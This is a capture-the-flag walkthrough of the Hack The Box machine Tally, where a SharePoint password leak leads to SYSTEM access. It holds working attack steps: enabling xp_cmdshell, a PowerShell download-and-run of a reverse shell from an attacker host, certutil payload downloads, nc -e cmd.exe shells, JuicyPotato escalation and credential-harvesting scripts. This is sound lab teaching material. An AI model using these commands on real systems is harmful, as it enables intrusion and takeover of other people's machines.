Service overview

$ nmapAutomator.sh -H 10.10.10.59 -t Full

PORT      STATE SERVICE            VERSION
21/tcp    open  ftp                Microsoft ftpd
| ftp-syst:
|_  SYST: Windows_NT
80/tcp    open  http               Microsoft IIS httpd 10.0
|_http-generator: Microsoft SharePoint
|_http-server-header: Microsoft-IIS/10.0
| http-title: Home
|_Requested resource was http://10.10.10.59/_layouts/15/start.aspx#/default.aspx
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
808/tcp   open  ccproxy-http?
1433/tcp  open  ms-sql-s           Microsoft SQL Server 2016 13.00.1601.00; RTM
| ms-sql-ntlm-info:
|   Target_Name: TALLY
|   NetBIOS_Domain_Name: TALLY
|   NetBIOS_Computer_Name: TALLY
|   DNS_Domain_Name: TALLY
|   DNS_Computer_Name: TALLY
|_  Product_Version: 10.0.14393
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-06-09T12:19:03
|_Not valid after:  2051-06-09T12:19:03
|_ssl-date: 2021-06-09T12:31:08+00:00; +4m10s from scanner time.
32844/tcp open  ssl/http           Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
| ssl-cert: Subject: commonName=SharePoint Services/organizationName=Microsoft/countryName=US
| Subject Alternative Name: DNS:localhost, DNS:tally
| Not valid before: 2017-09-17T22:51:16
|_Not valid after:  9999-01-01T00:00:00
|_ssl-date: 2021-06-09T12:31:08+00:00; +4m10s from scanner time.
| tls-alpn:
|   h2
|_  http/1.1
32846/tcp open  storagecraft-image StorageCraft Image Manager
47001/tcp open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49665/tcp open  msrpc              Microsoft Windows RPC
49667/tcp open  msrpc              Microsoft Windows RPC
49668/tcp open  msrpc              Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4m09s, deviation: 0s, median: 4m09s
| ms-sql-info:
|   10.10.10.59:1433:
|     Version:
|       name: Microsoft SQL Server 2016 RTM
|       number: 13.00.1601.00
|       Product: Microsoft SQL Server 2016
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-06-09T12:31:01
|_  start_date: 2021-06-09T12:18:38

Microsoft SharePoint:

http://10.10.10.59/_layouts/viewlsts.aspx

FTP credentials:
http://10.10.10.59/Shared%20Documents/ftp-details.docx

FTP details
hostname: tally
workgroup: htb.local
password: UTDRSCH53c"$6hys
Please create your own user folder upon logging in

ftp_user:UTDRSCH53c"$6hys

FTP

Download everything from the FTP server:
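
The recursive download above, as an added example (not the original writeup's command): a small ftplib mirror that logs in with the recovered credentials. The password contains `"` and `$`, so it is kept in single quotes in the script, and a helper builds the percent-encoded `ftp://` URL for `wget -m` or `curl`, where `"` becomes `%22` and `$` becomes `%24`. It assumes the server accepts absolute paths in CWD and returns bare names from NLST, which Microsoft ftpd does; nothing else about the target is assumed.

```python
"""Mirror the target's FTP tree with the recovered credentials.

Added example, not part of the original writeup. Assumes Microsoft ftpd
behaviour: absolute paths ("/", "/User", ...) work in CWD and NLST returns
bare entry names.
"""
import ftplib
import os
from urllib.parse import quote

HOST = "10.10.10.59"
USER = "ftp_user"
# Single quotes keep the " and $ literal; in a double-quoted shell string $6 would expand.
PASSWORD = 'UTDRSCH53c"$6hys'


def ftp_url(user: str, password: str, host: str, path: str = "/") -> str:
    """Build an ftp:// URL for wget -m / curl: the " and $ in the password
    must be percent-encoded (%22, %24) or the URL parser mangles them."""
    return f"ftp://{quote(user, safe='')}:{quote(password, safe='')}@{host}{path}"


def is_directory(ftp: ftplib.FTP, name: str) -> bool:
    """CWD into the entry and back; a plain file answers 550 (error_perm)."""
    here = ftp.pwd()
    try:
        ftp.cwd(name)
    except ftplib.error_perm:
        return False
    ftp.cwd(here)
    return True


def mirror(ftp: ftplib.FTP, remote_dir: str, local_dir: str) -> int:
    """Recursively download remote_dir into local_dir; returns the file count."""
    os.makedirs(local_dir, exist_ok=True)
    ftp.cwd(remote_dir)
    try:
        names = ftp.nlst()
    except ftplib.error_perm:
        names = []  # some servers answer 550 for an empty directory
    count = 0
    for name in names:
        if name in (".", ".."):
            continue
        remote_path = remote_dir.rstrip("/") + "/" + name
        local_path = os.path.join(local_dir, name)
        if is_directory(ftp, name):
            count += mirror(ftp, remote_path, local_path)
            ftp.cwd(remote_dir)  # the recursion changed the working directory
        else:
            with open(local_path, "wb") as fh:
                ftp.retrbinary("RETR " + name, fh.write)
            count += 1
    return count


def main() -> None:
    ftp = ftplib.FTP(HOST, timeout=30)
    ftp.login(USER, PASSWORD)
    n = mirror(ftp, "/", "ftp")
    ftp.quit()
    print(f"{n} files saved under ./ftp/ (wget equivalent: {ftp_url(USER, PASSWORD, HOST)})")


if __name__ == "__main__":
    main()
```

Run it from the attacker box; the tree lands under `./ftp/` with the same layout the writeup's `ftp/_/User/...` paths refer to.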

$ cat ftp/_/User/Sarah/notes.txt
install sharepoint, replace orchard cms

uninstall sql server 2016 (not done yet)

Brute force

KeePass database: ftp/_/User/Tim/Files/tim.kdbx.

keepass2john tim.kdbx > hash
john --wordlist=/usr/share/wordlists/rockyou.txt hash

=> simplementeyo (master password)
=> entries: windows tally acct (share credentials)
Finance:Acc0unting
cisco:cisco123
pdf writer:64257-56525-54257-54734

$ smbclient -L //10.10.10.59 -U Finance
        Sharename       Type      Comment
        ---------       ----      -------
        ACCT            Disk
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC

$ cat ftp/_/User/Tim/Project/Log/do\ to.txt
To do:

Remove migration folder
Set secure share permissions

encrypted share creds:

password in keepass

Reverse Shell

smb: \zz_Migration\Binaries\New folder\> get tester.exe
$ strings tester.exe | grep db

db: orcharddb
uid: sa
pwd: GWE3V65#6KFH93@4GWTG2G
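
The credential hunt above (`strings tester.exe | grep db`), as an added example that is not part of the original writeup. GNU `strings` prints only ASCII runs by default, while .NET and other Windows binaries often store text as UTF-16LE (`strings -e l`); the script below decodes both in one pass, filters for connection-string material and parses `key: value` pairs. The binary blob it runs on is constructed here to stand in for tester.exe, and the UTF-16 `Server=...` string in it is invented for the demonstration.

```python
"""Pull embedded connection-string material out of a Windows binary.

Added example, not part of the original writeup. Handles ASCII and UTF-16LE
strings (what `strings` and `strings -e l` print) in a single pass.
"""
import re
import sys
from typing import Dict, List

# Constructed stand-in for tester.exe (not the real file): the ASCII fragments
# seen in the writeup plus an invented UTF-16LE connection string and noise.
SAMPLE_BINARY = (
    b"MZ\x90\x00\x03\x00\x00\x00"
    b"db: orcharddb\x00uid: sa\x00pwd: GWE3V65#6KFH93@4GWTG2G\x00"
    b"\xff\xfe\x00\x01"
    + "Server=tally;Database=orcharddb".encode("utf-16-le")
    + b"\x00\x00\x7fELF"
)


def extract_strings(data: bytes, min_len: int = 4) -> List[str]:
    """Printable runs of at least min_len characters: ASCII first, then UTF-16LE."""
    ascii_re = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    utf16_re = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    found = [m.group().decode("ascii") for m in ascii_re.finditer(data)]
    found += [m.group().decode("utf-16-le") for m in utf16_re.finditer(data)]
    return found


# Substrings that usually mark database / credential material in a binary.
CRED_HINTS = ("uid", "user", "pwd", "password", "db", "server=", "connectionstring")


def find_credentials(data: bytes, min_len: int = 4) -> List[str]:
    """Strings that look like connection-string or credential material."""
    return [s for s in extract_strings(data, min_len)
            if any(h in s.lower() for h in CRED_HINTS)]


KV_RE = re.compile(r"^(db|uid|user(?: id)?|pwd|password)\s*[:=]\s*(\S.*)$", re.I)


def parse_kv(strings: List[str]) -> Dict[str, str]:
    """Turn 'uid: sa' / 'pwd=...' style strings into a dict keyed by lowercase name."""
    out: Dict[str, str] = {}
    for s in strings:
        m = KV_RE.match(s.strip())
        if m:
            out[m.group(1).lower()] = m.group(2).strip()
    return out


def main(argv: List[str]) -> None:
    # Usage: python extract_creds.py tester.exe   (falls back to the sample blob)
    data = open(argv[1], "rb").read() if len(argv) > 1 else SAMPLE_BINARY
    for s in find_credentials(data):
        print(s)
    creds = parse_kv(extract_strings(data))
    if creds:
        print("parsed:", creds)


if __name__ == "__main__":
    main(sys.argv)
```

Point it at the real tester.exe pulled from the ACCT share; the ASCII hits reproduce the `db:` / `uid:` / `pwd:` lines above, and any UTF-16 connection strings show up alongside them instead of being missed.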

Serve the Nishang reverse shell as shell.ps1 from a Python HTTP server on 10.10.14.2 and start a listener with nc -lvnp 1234.
SQL connection:
$ sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G

-- xp_cmdshell is hidden behind 'show advanced options'; both changes need sysadmin (sa has it)
exec sp_configure 'show advanced options', 1
go
reconfigure
go
-- enable the xp_cmdshell extended procedure
exec sp_configure 'xp_cmdshell',1
go
reconfigure
go
-- fetch and run the Nishang reverse shell from the attacker's HTTP server
xp_cmdshell "powershell IEX (New-Object Net.WebClient).downloadString('http://10.10.14.2/shell.ps1')"
go

User flag

PS C:\users\sarah\desktop> ipconfig
Windows IP Configuration

Ethernet adapter Ethernet0:

Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::3069:672c:126c:970d
Link-local IPv6 Address . . . . . : fe80::3069:672c:126c:970d%5
IPv4 Address. . . . . . . . . . . : 10.10.10.59
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1a7c%5
10.10.10.2

Tunnel adapter isatap.{DF30D885-6F85-4AAC-A76D-2B78DC87B71C}:

Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
PS C:\users\sarah\desktop> type user.txt
be72362e8dffeca2b42406d5d1c74bb1

Privilege escalation

> type "note to tim (draft).txt"
Hi Tim,
As discussed in the cybersec meeting, malware is often hidden in trusted executables in order to evade detection. I read somewhere that cmd.exe is a common target for backdooring, so I've gone ahead and disallowed any cmd.exe outside the Windows folder from executing.

Thanks,
Sarah

PS C:\users\sarah\desktop> type todo.txt
done:

install updates
check windows defender enabled

outstanding:

update intranet design
update server inventory

=> the latest updates are not installed, and nothing named cmd.exe can be run from outside the Windows folder.

Public exploit

https://www.exploit-db.com/exploits/42020

Rename cmd.exe to writeup.exe.

> whoami /priv
SeImpersonatePrivilege Impersonate a client after authentication Enabled

=> juicy potato
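
The step from `whoami /priv` to "juicy potato" above, as an added example that is not part of the original writeup: a parser for the full `whoami /priv` output that flags the privileges worth escalating with. The sample output is constructed in the format Windows prints (the writeup only shows the SeImpersonatePrivilege line), and the mapping of privileges to techniques is the usual checklist, not something taken from the target.

```python
"""Classify the output of `whoami /priv` for privilege-escalation leads.

Added example, not part of the original writeup. SAMPLE_WHOAMI_PRIV is a
constructed token listing in the format whoami prints on Windows.
"""
import re
import sys
from typing import Dict, List

SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Privileges that on their own give a path to SYSTEM. "Disabled" in whoami
# means present but not enabled: the process can enable it itself with
# AdjustTokenPrivileges, so it counts as much as "Enabled" does.
ABUSABLE = {
    "SeImpersonatePrivilege": "impersonate a SYSTEM token (JuicyPotato on Server 2016, PrintSpoofer/RoguePotato on newer builds)",
    "SeAssignPrimaryTokenPrivilege": "same potato family, via CreateProcessAsUser",
    "SeBackupPrivilege": "read any file, e.g. dump the SAM and SYSTEM hives",
    "SeRestorePrivilege": "write any file or registry key, e.g. replace a service binary",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeDebugPrivilege": "open and inject into SYSTEM processes",
    "SeLoadDriverPrivilege": "load a kernel driver",
    "SeTcbPrivilege": "act as part of the operating system",
}

PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+.+?\s+(Enabled|Disabled)$")


def parse_privileges(output: str) -> Dict[str, bool]:
    """Map each privilege in the token to True (Enabled) or False (Disabled)."""
    privs: Dict[str, bool] = {}
    for line in output.splitlines():
        m = PRIV_LINE.match(line.rstrip())
        if m:
            privs[m.group(1)] = m.group(2) == "Enabled"
    return privs


def abusable_privileges(output: str) -> List[str]:
    """Privileges from ABUSABLE present in the token, enabled or not, in whoami's order."""
    return [p for p in parse_privileges(output) if p in ABUSABLE]


def report(output: str) -> List[str]:
    """One line per abusable privilege, noting whether it still has to be enabled."""
    privs = parse_privileges(output)
    lines = []
    for p in abusable_privileges(output):
        state = "Enabled" if privs[p] else "Disabled (enable it first)"
        lines.append(f"{p}: {state}; {ABUSABLE[p]}")
    return lines


if __name__ == "__main__":
    # Usage: whoami /priv | python privs.py   (falls back to the sample when run bare)
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_WHOAMI_PRIV
    print("\n".join(report(text)) or "nothing obviously abusable")
```

On the sample the two potato-relevant privileges are reported; SeImpersonatePrivilege is already enabled, which is exactly the precondition JuicyPotato needs on this Server 2016 build.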

> certutil -urlcache -f "http://10.10.14.2/nc.exe" nc.exe
> certutil -urlcache -f "http://10.10.14.2/jp.exe" jp.exe

Attacker: nc -lnvp 1235
Target:   .\nc.exe 10.10.14.2 1235 -e cmd.exe
Attacker: nc -lnvp 1236

(take the CLSID from https://ohpe.it/juicy-potato/CLSID/Windows_Server_2016_Standard/)

jp.exe -l 4321 -p C:\Users\Sarah\Desktop\nc.exe -a "10.10.14.2 1236 -e cmd.exe" -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820}

Root flag

C:\Users\Administrator\Desktop>ipconfig
Windows IP Configuration

Ethernet adapter Ethernet0:

Connection-specific DNS Suffix . :
IPv6 Address. . . . . . . . . . . : dead:beef::3069:672c:126c:970d
Link-local IPv6 Address . . . . . : fe80::3069:672c:126c:970d%5
IPv4 Address. . . . . . . . . . . : 10.10.10.59
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1a7c%5
10.10.10.2

Tunnel adapter isatap.{DF30D885-6F85-4AAC-A76D-2B78DC87B71C}:

Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :

C:\Users\Administrator\Desktop>type root.txt
608bb707348105911c8991108e523eda